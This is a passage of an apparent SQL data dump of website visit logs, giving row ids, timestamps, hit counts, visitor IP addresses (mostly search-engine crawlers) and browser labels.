1,0,0,'66.249.66.218','chrome'),(438696,1564480123,1,1,0,0,'46.211.50.196','chrome'),(438697,1564480222,1,1,0,0,'141.8.188.29','other'),(438698,1564480226,1,1,0,0,'5.45.207.79','other'),(438699,1564480283,1,1,0,0,'141.8.188.11','other'),(438700,1564480455,1,1,0,0,'66.249.66.220','chrome'),(438701,1564480521,1,1,0,0,'40.77.167.151','other'),(438702,1564480691,1,1,0,0,'66.249.66.130','chrome'),(438703,1564481697,1,1,0,0,'5.45.207.79','other'),(438704,1564481810,1,1,0,0,'40.77.167.151','other'),(438705,1564482043,1,1,0,0,'109.74.154.72','chrome'),(438706,1564482280,1,1,0,0,'66.249.66.222','chrome'),(438707,1564482748,1,1,0,0,'40.77.167.151','other'),(438708,1564482899,1,1,0,0,'66.249.66.130','chrome'),(438709,1564483356,2,2,0,0,'141.8.188.29','other'),(438710,1564483493,1,1,0,0,'66.249.66.220','chrome'),(438711,1564484312,1,0,1,0,'5.9.142.17',''),(438712,1564484536,1,1,0,0,'87.250.224.65','other'),(438713,1564484825,1,1,0,0,'66.102.9.62','chrome'),(438714,1564484993,1,1,0,0,'40.77.167.151','other'),(438715,1564485288,1,1,0,0,'66.249.66.130','chrome'),(438716,1564485978,1,1,0,0,'66.249.66.222','chrome'),(438717,1564486350,1,1,0,0,'207.46.13.79','other'),(438718,1564486653,5,5,0,0,'40.77.167.151','other'),(438719,1564486662,2,2,0,0,'40.77.167.170','other'),(438720,1564487376,1,1,0,0,'46.211.44.8','chrome'),(438721,1564487466,2,2,0,0,'40.77.167.159','other'),(438722,1564487479,1,1,0,0,'207.46.13.79','other'),(438723,1564487668,1,1,0,0,'141.8.188.29','other'),(438724,1564488088,1,1,0,0,'8.29.198.27','other'),(438725,1564488737,1,1,0,0,'66.249.66.130','chrome'),(438726,1564488960,1,1,0,0,'91.196.178.79','chrome'),(438727,1564489716,2,2,0,0,'66.249.66.218','chrome'),(438728,1564489897,2,2,0,0,'66.249.66.222','chrome'),(438729,1564489898,1,1,0,0,'141.8.188.29','other'),(438730,1564490016,1,1,0,0,'207.46.13.79','other'),(438731,1564490469,1,1,0,0,'8.29.198.25','other'),(438732,1564491414,1,1,0,0,'40.77.167.159','other'),(438733,1564491858,2,2,0,0,'141.8.188.29','other'),(438734,1564492407,1,1,0,0,'207.46.13.79','other'),(438735,1564492599,1,1,0,0,'207.46.13.129','other'),(438736,1564492704,1,1,0,0,'66.249.66.222','chrome'),(438737,1564493179,1,1,0,0,'138.201.243.66','firefox'),(438738,1564493444,1,1,0,0,'141.8.142.103','other'),(438739,1564493580,1,1,0,0,'141.8.188.11','other'),(438740,1564494715,1,1,0,0,'66.249.66.218','chrome'),(438741,1564494962,1,1,0,0,'141.8.188.11','other'),(438742,1564495387,1,1,0,0,'95.158.60.48','chrome'),(438743,1564495748,1,1,0,0,'37.53.73.6','chrome'),(438744,1564496182,1,1,0,0,'66.249.66.220','chrome'),(438745,1564496845,1,1,0,0,'141.8.142.103','other'),(438746,1564496858,2,2,0,0,'207.46.13.167','other'),(438747,1564497414,2,2,0,0,'141.8.188.29','other'),(438748,1564497571,1,1,0,0,'141.8.188.11','other'),(438749,1564497837,1,1,0,0,'207.46.13.129','other'),(438750,1564498042,1,1,0,0,'157.55.39.56','other'),(438751,1564498832,1,1,0,0,'13.66.139.0','other'),(438752,1564498868,1,1,0,0,'66.249.66.218','chrome'),(438753,1564498974,1,1,0,0,'8.29.198.25','other'),(438754,1564499399,1,1,0,0,'66.249.66.220','chrome'),(438755,1564499733,1,1,0,0,'207.46.13.129','other'),(438756,1564499735,1,1,0,0,'66.249.66.222','chrome'),(438757,1564499999,1,1,0,0,'66.249.66.218','chrome'),(438758,1564500048,1,1,0,0,'40.77.167.149','other'),(438759,1564500893,1,1,0,0,'141.8.188.29','other'),(438760,1564501333,1,1,0,0,'8.29.198.25','other'),(438761,1564501935,1,1,0,0,'207.46.13.129','other'),(438762,1564502211,1,1,0,0,'91.196.178.136','chrome'),(438763,1564502616,1,1,0,0,'66.249.66.222','chrome'),(438764,1564502820,2,2,0,0,'66.249.66.218','chrome'),(438765,1564502828,1,1,0,0,'66.249.66.220','chrome'),(438766,1564503297,2,2,0,0,'13.66.139.0','other'),(438767,1564504602,1,1,0,0,'66.249.66.222','chrome'),(438768,1564504668,1,1,0,0,'5.45.207.79','other'),(438769,1564504706,1,1,0,0,'87.250.224.65','other'),(438770,1564505770,1,1,0,0,'91.196.178.86','chrome'),(438771,1564505942,1,1,0,0,'37.9.113.20','other'),(438772,1564506348,1,1,0,0,'141.8.188.29','other'),(438773,1564507063,1,1,0,0,'66.249.66.218','chrome'),(438774,1564507169,1,1,0,0,'207.46.13.167','other'),(438775,1564507739,1,1,0,0,'157.55.39.56','other'),(438776,1564508024,2,2,0,0,'141.8.188.29','other'),(438777,1564508183,1,1,0,0,'157.55.39.215','other'),(438778,1564508750,1,1,0,0,'207.46.13.129','other'),(438779,1564508868,1,1,0,0,'66.249.66.222','chrome'),(438780,1564509395,1,1,0,0,'66.249.66.218','chrome'),(438781,1564509402,1,1,0,0,'66.249.66.220','chrome'),(438782,1564509802,1,1,0,0,'5.45.207.79','other'),(438783,1564509811,1,1,0,0,'141.8.188.29','other'),(438784,1564509819,1,1,0,0,'8.29.198.25','other'),(438785,1564510315,1,1,0,0,'66.249.66.222','chrome'),(438786,1564511520,1,1,0,0,'40.77.167.147','other'),(438787,1564511539,2,2,0,0,'141.8.188.29','other'),(438788,1564511647,1,1,0,0,'141.8.188.11','other'),(438789,1564512120,1,1,0,0,'207.46.13.129','other'),(438790,1564512177,1,1,0,0,'8.29.198.26','other'),(438791,1564512468,1,1,0,0,'178.165.113.164','chrome'),(438792,1564512768,1,1,0,0,'66.249.66.222','chrome'),(438793,1564512993,1,1,0,0,'178.154.200.48','other'),(438794,1564513428,1,1,0,0,'141.8.188.29','other'),(438795,1564513501,3,3,0,0,'178.63.13.154','other'),(438796,1564514250,1,1,0,0,'178.95.102.224','chrome'),(438797,1564514469,1,1,0,0,'157.55.39.56','other'),(438798,1564514496,2,2,0,0,'66.249.66.220','chrome'),(438799,1564514544,1,1,0,0,'141.8.142.103','other'),(438800,1564514802,1,1,0,0,'66.249.66.218','chrome'),(438801,1564514935,1,1,0,0,'157.55.39.215','other'),(438802,1564515754,1,1,0,0,'66.249.66.132','chrome'),(438803,1564516223,1,1,0,0,'180.76.15.30','other'),(438804,1564516847,1,1,0,0,'66.249.66.222','chrome'),(438805,1564517594,1,1,0,0,'66.249.66.132','chrome'),(438806,1564517904,1,1,0,0,'157.55.39.56','other'),(438807,1564518252,1,1,0,0,'40.77.167.147','other'),(438808,1564518724,1,1,0,0,'66.102.9.28','chrome'),(438809,1564519180,1,1,0,0,'141.8.188.11','other'),(438810,1564519294,1,1,0,0,'87.250.224.47','other'),(438811,1564520258,1,1,0,0,'5.45.207.79','other'),(438812,1564520277,1,1,0,0,'207.46.13.129','other'),(438813,1564520385,1,1,0,0,'66.249.66.132','chrome'),(438814,1564520657,1,1,0,0,'8.29.198.27','other'),(438815,1564521510,1,1,0,0,'157.55.39.56','other'),(438816,1564522627,1,1,0,0,'157.55.39.230','other'),(438817,1564523026,1,1,0,0,'8.29.198.25','other'),(438818,1564523155,1,1,0,0,'66.249.66.128','chrome'),(438819,1564523679,1,1,0,0,'66.249.66.222','chrome'),(438820,1564524329,1,1,0,0,'66.249.66.220','chrome'),(438821,1564526259,1,1,0,0,'66.249.66.128','chrome'),(438822,1564526313,1,1,0,0,'40.77.167.61','other'),(438823,1564526372,1,1,0,0,'66.249.66.132','chrome'),(438824,1564526456,2,2,0,0,'141.8.188.11','other'),(438825,1564526725,1,1,0,0,'66.249.66.220','chrome'),(438826,1564526989,1,1,0,0,'141.8.188.29','other'),(438827,1564527221,1,1,0,0,'180.76.15.19','other'),(438828,1564527656,1,1,0,0,'66.249.66.220','chrome'),(438829,1564527751,1,1,0,0,'103.47.147.2','chrome'),(438830,1564528511,1,1,0,0,'40.77.167.61','other'),(438831,1564529138,1,1,0,0,'207.46.13.214','other'),(438832,1564529948,1,1,0,0,'66.249.66.222','chrome'),(438833,1564530160,1,1,0,0,'66.249.66.220','chrome'),(438834,1564531493,1,1,0,0,'8.29.198.26','other'),(438835,1564531925,1,1,0,0,'207.46.13.214','other'),(438836,1564532464,1,1,0,0,'85.206.165.8','chrome'),(438837,1564532697,3,3,0,0,'66.249.66.218','chrome'),(438838,1564533186,2,2,0,0,'66.249.66.220','chrome'),(438839,1564533368,2,2,0,0,'66.249.66.222','chrome'),(438840,1564533442,4,4,0,0,'157.55.39.70','other'),(438841,1564533877,1,1,0,0,'8.29.198.27','other'),(438842,1564534732,1,1,0,0,'66.249.66.218','chrome'),(438843,1564536505,1,1,0,0,'40.77.167.181','other'),(438844,1564537161,1,1,0,0,'207.46.13.214','other'),(438845,1564537263,1,1,0,0,'66.249.66.220','chrome'),(438846,1564537324,1,1,0,0,'31.184.238.211','chrome'),(438847,1564537638,1,1,0,0,'66.249.66.218','chrome'),(438848,1564537768,1,1,0,0,'13.66.139.0','other'),(438849,1564538128,1,1,0,0,'66.249.66.222','chrome'),(438850,1564539503,1,1,0,0,'40.77.167.181','other'),(438851,1564540616,1,1,0,0,'66.249.66.222','chrome'),(438852,1564541053,2,2,0,0,'66.249.66.218','chrome'),(438853,1564541111,1,1,0,0,'207.46.13.8','other'),(438854,1564541461,2,2,0,0,'66.249.66.220','chrome'),(438855,1564542340,1,1,0,0,'8.29.198.25','other'),(438856,1564543324,1,1,0,0,'5.45.207.79','other'),(438857,1564543934,1,1,0,0,'141.8.188.29','other'),(438858,1564544535,1,1,0,0,'51.68.152.26','chrome'),(438859,1564544724,1,1,0,0,'8.29.198.25','other'),(438860,1564544838,1,1,0,0,'157.55.39.12','other'),(438861,1564544844,1,1,0,0,'91.209.11.236','other'),(438862,1564545113,2,2,0,0,'66.249.66.218','chrome'),(438863,1564545375,1,1,0,0,'66.249.66.222','chrome'),(438864,1564546026,1,1,0,0,'66.249.66.218','chrome'),(438865,1564546033,1,1,0,0,'66.249.66.220','chrome'),(438866,1564546995,2,2,0,0,'141.8.188.11','other'),(438867,1564547403,1,1,0,0,'66.249.66.218','chrome'),(438868,1564547880,1,1,0,0,'141.8.188.29','other'),(438869,1564548961,4,4,0,0,'88.198.69.233','other'),(438870,1564549107,1,1,0,0,'157.55.39.12','other'),(438871,1564549581,2,2,0,0,'66.249.66.222','chrome'),(438872,1564549622,2,2,0,0,'141.8.188.29','other'),(438873,1564549832,1,1,0,0,'66.249.66.218','chrome'),(438874,1564550458,1,1,0,0,'207.46.13.52','other'),(438875,1564550524,1,1,0,0,'95.24.201.60','msie'),(438876,1564550525,1,1,0,0,'37.145.186.88','msie'),(438877,1564550636,1,1,0,0,'66.249.66.132','chrome'),(438878,1564550881,1,1,0,0,'87.250.224.47','other'),(438879,1564551053,1,1,0,0,'91.196.178.174','chrome'),(438880,1564552011,1,1,0,0,'66.249.66.220','chrome'),(438881,1564552367,1,1,0,0,'141.8.188.29','other'),(438882,1564552571,1,1,0,0,'207.46.13.122','other'),(438883,1564552737,1,1,0,0,'5.45.207.79','other'),(438884,1564553178,1,1,0,0,'8.29.198.27','other'),(438885,1564553207,1,1,0,0,'66.249.66.132','chrome'),(438886,1564553813,1,1,0,0,'66.249.66.220','chrome'),(438887,1564554373,1,1,0,0,'5.45.207.79','other'),(438888,1564554387,1,1,0,0,'141.8.188.29','other'),(438889,1564554482,2,2,0,0,'141.8.188.11','other'),(438890,1564554902,2,2,0,0,'66.249.66.220','chrome'),(438891,1564555333,1,1,0,0,'66.249.66.218','chrome'),(438892,1564555541,1,1,0,0,'66.249.66.130','chrome'),(438893,1564555557,1,1,0,0,'8.29.198.26','other'),(438894,1564555656,1,1,0,0,'207.46.13.8','other'),(438895,1564556013,1,1,0,0,'5.45.207.79','other'),(438896,1564556232,1,1,0,0,'157.55.39.58','other'),(438897,1564556445,1,1,0,0,'157.55.39.235','other'),(438898,1564556766,1,1,0,0,'66.249.66.128','chrome'),(438899,1564556768,2,2,0,0,'66.249.66.220','chrome'),(438900,1564557422,1,1,0,0,'66.249.66.218','chrome'),(438901,1564557541,1,1,0,0,'157.55.39.58','other'),(438902,1564557624,1,1,0,0,'109.70.100.29','other'),(438903,1564557717,1,1,0,0,'109.248.149.36','chrome'),(438904,1564557831,2,2,0,0,'157.55.39.70','other'),(438905,1564557835,1,1,0,0,'207.46.13.8','other'),(438906,1564558948,2,2,0,0,'141.8.188.11','other'),(438907,1564559262,1,1,0,0,'66.249.66.128','chrome'),(438908,1564559278,1,1,0,0,'66.249.66.218','chrome'),(438909,1564559311,1,1,0,0,'66.249.66.220','chrome'),(438910,1564559430,2,2,0,0,'66.249.66.132','chrome'),(438911,1564559704,1,1,0,0,'91.196.178.174','chrome'),(438912,1564559878,1,1,0,0,'209.17.96.210','other'),(438913,1564560041,1,1,0,0,'94.178.6.118','chrome'),(438914,1564560538,1,1,0,0,'66.249.66.218','chrome'),(438915,1564561534,1,1,0,0,'157.55.39.58','other'),(438916,1564563051,1,1,0,0,'66.249.66.128','chrome'),(438917,1564563394,1,1,0,0,'141.8.188.49','other'),(438918,1564563419,1,1,0,0,'134.249.146.125','chrome'),(438919,1564563854,1,1,0,0,'87.250.224.47','other'),(438920,1564564005,1,1,0,0,'66.249.66.130','chrome'),(438921,1564564018,1,1,0,0,'8.29.198.27','other'),(438922,1564564715,1,1,0,0,'66.249.66.220','chrome'),(438923,1564564966,1,1,0,0,'13.66.139.0','other'),(438924,1564566053,1,1,0,0,'91.196.178.170','chrome'),(438925,1564566228,1,1,0,0,'157.55.39.235','other'),(438926,1564566260,1,1,0,0,'66.249.66.218','chrome'),(438927,1564566404,1,1,0,0,'8.29.198.26','other'),(438928,1564566775,2,2,0,0,'66.249.66.220','chrome'),(438929,1564567819,1,1,0,0,'91.196.177.227','chrome'),(438930,1564567825,2,2,0,0,'66.249.66.218','chrome'),(438931,1564568457,1,1,0,0,'66.249.66.222','chrome'),(438932,1564568527,1,1,0,0,'66.249.66.220','chrome'),(438933,1564568641,9,9,0,0,'213.239.216.194','other'),(438934,1564568719,1,1,0,0,'95.108.181.54','other'),(438935,1564568761,1,1,0,0,'141.8.142.103','other'),(438936,1564568968,1,1,0,0,'109.74.154.72','chrome'),(438937,1564569593,2,2,0,0,'95.213.141.126','opera'),(438938,1564569907,1,1,0,0,'66.249.66.222','chrome'),(438939,1564570337,1,1,0,0,'180.76.15.34','other'),(438940,1564570444,1,1,0,0,'157.55.39.172','other'),(438941,1564570598,1,1,0,0,'66.249.66.218','chrome'),(438942,1564570891,1,1,0,0,'66.249.66.222','chrome'),(438943,1564570910,2,2,0,0,'66.249.66.220','chrome'),(438944,1564571836,1,1,0,0,'141.8.183.22','other'),(438945,1564572367,1,1,0,0,'66.249.66.128','chrome'),(438946,1564572543,1,1,0,0,'66.249.66.220','chrome'),(438947,1564572970,1,1,0,0,'13.66.139.0','other'),(438948,1564573035,1,1,0,0,'87.250.224.47','other'),(438949,1564573223,1,1,0,0,'40.77.167.3','other'),(438950,1564574601,1,1,0,0,'66.249.66.128','chrome'),(438951,1564574850,1,1,0,0,'8.29.198.27','other'),(438952,1564574894,1,1,0,0,'141.8.188.29','other'),(438953,1564575814,1,1,0,0,'66.249.66.218','chrome'),(438954,1564575934,3,3,0,0,'66.249.66.220','chrome'),(438955,1564576215,1,1,0,0,'157.55.39.172','other'),(438956,1564576633,1,1,0,0,'40.77.167.212','other'),(438957,1564576811,2,2,0,0,'66.249.66.218','chrome'),(438958,1564576820,1,1,0,0,'207.46.13.22','other'),(438959,1564576866,3,3,0,0,'66.249.66.222','chrome'),(438960,1564577246,1,1,0,0,'8.29.198.27','other'),(438961,1564578916,2,2,0,0,'40.77.167.212','other'),(438962,1564579537,1,1,0,0,'37.52.108.205','chrome'),(438963,1564579549,1,1,0,0,'185.21.255.182','chrome'),(438964,1564579605,1,1,0,0,'157.55.39.172','other'),(438965,1564580133,1,1,0,0,'46.201.253.158','chrome'),(438966,1564581349,1,1,0,0,'207.46.13.22','other'),(438967,1564581911,1,1,0,0,'40.77.167.212','other'),(438968,1564582342,1,1,0,0,'66.249.66.218','chrome'),(438969,1564582883,1,1,0,0,'141.8.188.29','other'),(438970,1564583113,1,1,0,0,'157.55.39.172','other'),(438971,1564583314,1,1,0,0,'5.45.207.79','other'),(438972,1564583444,1,1,0,0,'66.249.66.220','chrome'),(438973,1564583817,1,1,0,0,'91.196.178.83','chrome'),(438974,1564583986,1,1,0,0,'66.249.66.130','chrome'),(438975,1564584019,1,1,0,0,'207.46.13.109','other'),(438976,1564584464,1,1,0,0,'207.46.13.22','other'),(438977,1564584630,1,1,0,0,'40.77.167.212','other'),(438978,1564584974,2,2,0,0,'157.55.39.172','other'),(438979,1564585042,1,1,0,0,'207.46.13.109','other'),(438980,1564585400,3,3,0,0,'66.249.66.222','chrome'),(438981,1564585703,1,1,0,0,'8.29.198.26','other'),(438982,1564585964,1,1,0,0,'40.77.167.212','other'),(438983,1564585991,1,1,0,0,'157.55.39.172','other'),(438984,1564586189,4,4,0,0,'66.249.66.220','chrome'),(438985,1564588108,1,1,0,0,'8.29.198.27','other'),(438986,1564588292,1,1,0,0,'213.180.203.17','other'),(438987,1564588339,2,2,0,0,'66.249.66.128','chrome'),(438988,1564588899,1,1,0,0,'46.42.167.6','msie'),(438989,1564589067,1,1,0,0,'157.55.39.2','other'),(438990,1564589268,1,1,0,0,'95.108.213.50','other'),(438991,1564589679,1,1,0,0,'141.8.142.108','other'),(438992,1564590300,1,1,0,0,'66.249.66.218','chrome'),(438993,1564590815,2,2,0,0,'66.249.66.128','chrome'),(438994,1564591024,1,1,0,0,'157.55.39.2','other'),(438995,1564591107,1,1,0,0,'213.180.203.40','other'),(438996,1564591110,1,1,0,0,'5.255.253.16','other'),(438997,1564591443,1,1,0,0,'141.8.188.29','other'),(438998,1564592025,2,2,0,0,'66.249.66.222','chrome'),(438999,1564592266,1,1,0,0,'141.8.188.11','other'),(439000,1564592373,2,2,0,0,'66.249.66.220','chrome'),(439001,1564592905,2,2,0,0,'157.55.39.2','other'),(439002,1564593103,1,1,0,0,'207.46.13.22','other'),(439003,1564593609,1,1,0,0,'66.249.66.218','chrome'),(439004,1564594315,1,1,0,0,'207.46.13.109','other'),(439005,1564594558,1,1,0,0,'66.249.66.222','chrome'),(439006,1564594702,1,1,0,0,'66.249.66.218','chrome'),(439007,1564594707,1,1,0,0,'66.249.66.220','chrome'),(439008,1564594938,1,1,0,0,'40.77.167.65','other'),(439009,1564595253,2,2,0,0,'207.46.13.109','other'),(439010,1564595872,1,1,0,0,'91.196.178.171','chrome'),(439011,1564595882,1,1,0,0,'91.209.11.236','other'),(439012,1564596541,1,1,0,0,'8.29.198.25','other'),(439013,1564596585,1,1,0,0,'66.249.66.218','chrome'),(439014,1564597125,1,1,0,0,'66.249.66.222','chrome'),(439015,1564597128,1,1,0,0,'157.55.39.2','other'),(439016,1564597654,1,1,0,0,'207.46.13.22','other'),(439017,1564598893,2,2,0,0,'66.249.66.222','chrome'),(439018,1564598957,1,1,0,0,'8.29.198.27','other'),(439019,1564599044,3,3,0,0,'157.55.39.2','other'),(439020,1564599205,1,1,0,0,'207.46.13.22','other'),(439021,1564599422,3,3,0,0,'66.249.66.220','chrome'),(439022,1564600017,1,1,0,0,'157.55.39.2','other'),(439023,1564600138,2,2,0,0,'66.249.66.218','chrome'),(439024,1564600426,1,1,0,0,'66.249.66.220','chrome'),(439025,1564600560,1,1,0,0,'91.214.211.246','firefox'),(439026,1564600629,1,1,0,0,'46.211.123.119','chrome'),(439027,1564600931,2,2,0,0,'66.249.66.222','chrome'),(439028,1564601058,1,1,0,0,'207.46.13.109','other'),(439029,1564601814,1,1,0,0,'66.249.66.220','chrome'),(439030,1564601857,1,1,0,0,'66.249.66.132','chrome'),(439031,1564602003,1,1,0,0,'207.46.13.109','other'),(439032,1564602122,1,1,0,0,'66.249.66.222','chrome'),(439033,1564602426,2,2,0,0,'207.46.13.22','other'),(439034,1564602892,1,1,0,0,'66.249.66.128','chrome'),(439035,1564603097,1,1,0,0,'157.55.39.2','other'),(439036,1564603189,1,1,0,0,'207.46.13.109','other'),(439037,1564603470,1,1,0,0,'66.249.66.218','chrome'),(439038,1564604123,1,1,0,0,'141.8.188.29','other'),(439039,1564604585,1,1,0,0,'66.249.66.220','chrome'),(439040,1564604931,3,3,0,0,'66.249.66.222','chrome'),(439041,1564605477,1,1,0,0,'66.249.66.218','chrome'),(439042,1564605526,1,1,0,0,'40.77.167.65','other'),(439043,1564606493,1,1,0,0,'40.77.167.101','other'),(439044,1564607106,1,1,0,0,'40.77.167.65','other'),(439045,1564607144,1,1,0,0,'66.249.66.218','chrome'),(439046,1564607277,1,1,0,0,'141.8.188.11','other'),(439047,1564607383,3,3,0,0,'66.249.66.220','chrome'),(439048,1564607392,1,1,0,0,'8.29.198.26','other'),(439049,1564607461,2,2,0,0,'141.8.188.29','other'),(439050,1564609302,1,1,0,0,'40.77.167.101','other'),(439051,1564609346,1,1,0,0,'66.249.66.218','chrome'),(439052,1564609452,1,1,0,0,'207.46.13.109','other'),(439053,1564609798,1,1,0,0,'8.29.198.27','other'),(439054,1564609835,3,3,0,0,'66.249.66.220','chrome'),(439055,1564610160,1,1,0,0,'66.249.66.130','chrome'),(439056,1564610406,1,1,0,0,'5.45.207.79','other'),(439057,1564610611,1,1,0,0,'40.77.167.101','other'),(439058,1564611947,1,1,0,0,'141.8.188.11','other'),(439059,1564612101,1,1,0,0,'40.77.167.101','other'),(439060,1564612109,1,1,0,0,'66.249.66.220','chrome'),(439061,1564612489,1,1,0,0,'40.77.167.45','other'),(439062,1564612891,2,2,0,0,'66.249.66.218','chrome'),(439063,1564613398,2,2,0,0,'141.8.188.11','other'),(439064,1564614079,3,3,0,0,'66.249.66.218','chrome'),(439065,1564614191,2,2,0,0,'66.249.66.222','chrome'),(439066,1564614364,1,1,0,0,'103.47.147.2','chrome'),(439067,1564614515,2,2,0,0,'40.77.167.45','other'),(439068,1564614559,1,1,0,0,'66.249.66.220','chrome'),(439069,1564614854,2,2,0,0,'209.95.51.171','firefox'),(439070,1564614926,2,2,0,0,'141.8.188.29','other'),(439071,1564615036,2,2,0,0,'169.47.14.67','msie'),(439072,1564615527,1,1,0,0,'207.46.13.109','other'),(439073,1564615735,2,2,0,0,'66.249.66.218','chrome'),(439074,1564615818,1,1,0,0,'66.249.66.220','chrome'),(439075,1564616462,1,1,0,0,'66.249.66.130','chrome'),(439076,1564616712,1,1,0,0,'5.45.207.19','other'),(439077,1564616858,1,1,0,0,'141.8.188.29','other'),(439078,1564617483,3,3,0,0,'66.249.66.220','chrome'),(439079,1564617785,1,1,0,0,'207.46.13.80','other'),(439080,1564617825,1,1,0,0,'66.249.66.218','chrome'),(439081,1564617866,1,1,0,0,'40.77.167.45','other'),(439082,1564618235,1,1,0,0,'8.29.198.25','other'),(439083,1564618242,1,1,0,0,'141.8.142.103','other'),(439084,1564618283,1,1,0,0,'5.45.207.19','other'),(439085,1564618419,1,1,0,0,'5.45.207.79','other'),(439086,1564618979,3,3,0,0,'40.77.167.45','other'),(439087,1564619207,1,1,0,0,'40.77.167.110','other'),(439088,1564619239,1,1,0,0,'207.46.13.80','other'),(439089,1564619507,1,1,0,0,'66.249.66.222','chrome'),(439090,1564619619,1,1,0,0,'141.8.142.103','other'),(439091,1564619654,1,1,0,0,'141.8.188.11','other'),(439092,1564620226,3,3,0,0,'66.249.66.220','chrome'),(439093,1564620631,2,2,0,0,'66.249.66.222','chrome'),(439094,1564620633,2,2,0,0,'66.249.66.218','chrome'),(439095,1564620641,1,1,0,0,'8.29.198.25','other'),(439096,1564621605,1,1,0,0,'191.101.101.242','chrome'),(439097,1564622019,1,1,0,0,'66.249.66.222','chrome'),(439098,1564622083,1,1,0,0,'193.106.30.99','chrome'),(439099,1564622326,1,1,0,0,'37.9.113.148','other'),(439100,1564622404,3,3,0,0,'78.46.176.21','other'),(439101,1564622560,2,2,0,0,'40.77.167.45','other'),(439102,1564622827,1,1,0,0,'66.249.66.218','chrome'),(439103,1564623011,1,1,0,0,'66.249.66.220','chrome'),(439104,1564623123,1,1,0,0,'66.249.66.222','chrome'),(439105,1564623488,1,1,0,0,'66.249.66.130','chrome'),(439106,1564623695,1,1,0,0,'193.106.30.99','chrome'),(439107,1564624285,45,45,0,0,'91.137.17.231','other'),(439108,1564624291,1,1,0,0,'40.77.167.45','other'),(439109,1564624496,1,1,0,0,'207.46.13.80','other'),(439110,1564624629,8,8,0,0,'95.91.76.93','other'),(439111,1564625035,1,1,0,0,'66.249.66.218','chrome'),(439112,1564625245,1,1,0,0,'66.249.66.220','chrome'),(439113,1564625518,2,2,0,0,'66.249.66.222','chrome'),(439114,1564626452,1,1,0,0,'66.249.66.218','chrome'),(439115,1564626573,4,4,0,0,'66.249.66.222','chrome'),(439116,1564626605,1,1,0,0,'207.46.13.80','other'),(439117,1564626737,1,1,0,0,'141.8.188.29','other'),(439118,1564627131,1,1,0,0,'66.249.66.220','chrome'),(439119,1564628075,4,4,0,0,'66.249.66.220','chrome'),(439120,1564628192,1,1,0,0,'180.76.15.6','other'),(439121,1564628415,1,1,0,0,'141.8.188.11','other'),(439122,1564628965,1,1,0,0,'66.249.66.222','chrome'),(439123,1564629075,1,1,0,0,'8.29.198.25','other'),(439124,1564629310,1,1,0,0,'207.46.13.189','other'),(439125,1564629549,1,1,0,0,'141.8.188.29','other'),(439126,1564630141,2,2,0,0,'66.249.66.222','chrome'),(439127,1564630296,1,1,0,0,'207.46.13.189','other'),(439128,1564631004,1,1,0,0,'66.249.66.220','chrome'),(439129,1564631493,1,1,0,0,'8.29.198.27','other'),(439130,1564631596,1,1,0,0,'66.249.66.218','chrome'),(439131,1564631927,1,1,0,0,'157.55.39.57','other'),(439132,1564632138,1,1,0,0,'40.77.167.152','other'),(439133,1564632642,1,1,0,0,'66.249.66.222','chrome'),(439134,1564632783,1,1,0,0,'141.8.188.29','other'),(439135,1564632973,1,1,0,0,'66.249.66.220','chrome'),(439136,1564633522,2,2,0,0,'66.249.66.218','chrome'),(439137,1564634451,1,1,0,0,'66.249.66.218','chrome'),(439138,1564634485,1,1,0,0,'66.249.66.220','chrome'),(439139,1564634571,1,1,0,0,'66.249.66.222','chrome'),(439140,1564634871,1,1,0,0,'207.46.13.209','other'),(439141,1564636210,2,2,0,0,'207.46.13.209','other'),(439142,1564636348,3,3,0,0,'66.249.66.218','chrome'),(439143,1564636457,1,1,0,0,'66.249.66.222','chrome'),(439144,1564636561,1,1,0,0,'66.249.66.132','chrome'),(439145,1564636736,1,1,0,0,'91.196.178.135','firefox'),(439146,1564636992,1,1,0,0,'141.8.188.29','other'),(439147,1564637390,1,1,0,0,'157.55.39.228','other'),(439148,1564637504,1,1,0,0,'207.46.13.209','other'),(439149,1564637820,2,2,0,0,'66.249.66.220','chrome'),(439150,1564638507,4,4,0,0,'141.8.188.29','other'),(439151,1564638598,1,1,0,0,'89.234.157.254','other'),(439152,1564638815,1,1,0,0,'40.77.167.152','other'),(439153,1564638934,1,1,0,0,'157.55.39.57','other'),(439154,1564639111,1,1,0,0,'66.249.66.220','chrome'),(439155,1564639910,1,1,0,0,'8.29.198.26','other'),(439156,1564640000,1,1,0,0,'66.249.66.222','chrome'),(439157,1564640043,2,2,0,0,'66.249.66.218','chrome'),(439158,1564640747,1,1,0,0,'40.77.167.152','other'),(439159,1564640829,1,1,0,0,'43.255.39.157','other'),(439160,1564641024,1,1,0,0,'91.196.178.72','chrome'),(439161,1564641607,1,1,0,0,'37.73.23.235','chrome'),(439162,1564641629,2,2,0,0,'66.249.66.218','chrome'),(439163,1564641828,7,7,0,0,'43.255.39.157','other'),(439164,1564641830,1,1,0,0,'157.55.39.59','other'),(439165,1564642342,1,1,0,0,'8.29.198.26','other'),(439166,1564642625,1,1,0,0,'180.76.15.142','other'),(439167,1564643083,1,1,0,0,'207.46.13.209','other'),(439168,1564643849,1,1,0,0,'66.249.66.222','chrome'),(439169,1564644432,1,1,0,0,'91.196.178.72','chrome'),(439170,1564644447,2,2,0,0,'157.55.39.57','other'),(439171,1564644452,1,1,0,0,'157.55.39.104','other'),(439172,1564644456,2,2,0,0,'40.77.167.152','other'),(439173,1564644462,1,1,0,0,'207.46.13.209','other'),(439174,1564644967,1,1,0,0,'66.249.66.222','chrome'),(439175,1564645067,1,1,0,0,'141.8.142.103','other'),(439176,1564645908,1,1,0,0,'66.249.66.222','chrome'),(439177,1564646501,1,1,0,0,'40.77.167.152','other'),(439178,1564647092,1,1,0,0,'66.249.66.222','chrome'),(439179,1564647721,1,1,0,0,'109.173.85.172','msie'),(439180,1564647737,2,2,0,0,'157.55.39.104','other'),(439181,1564648354,1,1,0,0,'66.249.66.218','chrome'),(439182,1564648466,1,1,0,0,'66.249.66.222','chrome'),(439183,1564648590,1,1,0,0,'46.164.130.92','firefox'),(439184,1564650049,1,1,0,0,'37.73.134.111','chrome'),(439185,1564650384,1,1,0,0,'91.196.178.161','chrome'),(439186,1564650568,1,1,0,0,'66.249.66.132','chrome'),(439187,1564650660,3,3,0,0,'66.249.66.220','chrome'),(439188,1564650748,1,1,0,0,'8.29.198.26','other'),(439189,1564651295,1,1,0,0,'157.55.39.104','other'),(439190,1564651479,2,2,0,0,'66.249.66.222','chrome'),(439191,1564651584,1,1,0,0,'141.8.188.29','other'),(439192,1564652246,1,1,0,0,'95.108.213.4','other'),(439193,1564652324,2,2,0,0,'66.249.66.220','chrome'),(439194,1564652497,1,1,0,0,'66.249.66.218','chrome'),(439195,1564652841,1,1,0,0,'176.36.21.189','chrome'),(439196,1564653179,1,1,0,0,'8.2